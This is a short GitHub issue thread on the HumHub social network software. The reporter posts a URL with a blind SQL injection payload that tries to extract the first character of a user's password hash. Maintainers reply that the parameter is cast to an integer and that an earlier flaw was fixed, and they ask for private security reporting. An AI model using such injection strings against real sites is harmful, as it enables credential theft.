### ISSUE TITLE
Bug !!!!

### ISSUE THREAD

**Issue by JeXawoW** [humhub/humhub#987]
http://www.site.com/index.php?r=notification/list/index&from=999)%20AND%20(CASE%20WHEN%200x30%3C(SELECT%20substring(password,1,1)%20FROM%20user_password%20WHERE%20id%20=%201)%20THEN%201%20ELSE%200%20END)%20AND%20(1=1

![23](https://cloud.githubusercontent.com/assets/7725575/7342524/384e36e8-ecbe-11e4-9afc-6682d765321b.PNG)
![23232](https://cloud.githubusercontent.com/assets/7725575/7342526/3b84c0fc-ecbe-11e4-9feb-45fc432c7c98.PNG)

**Comment by luke-** [comment]
Which version do you use?

**Comment by JeXawoW** [comment]
0.11.1

**Comment by luke-** [comment]
What's the exact problem?

**Comment by ASPIRINpp** [comment]
I don't see bug... GET param "form" converted to int in https://github.com/humhub/humhub/blob/master/protected/modules_core/notification/controllers/ListController.php#L46 and added user id
![screen](https://cloud.githubusercontent.com/assets/2103103/7346583/9c134a22-ece8-11e4-8a67-227b088a711d.PNG)

**Comment by luke-** [comment]
There was an Issue in 0.8 or 0.9 which is fixed since Nov. 2014.

Anyway please do not open security related issues in github
Please contact us directly via info@humhub.com
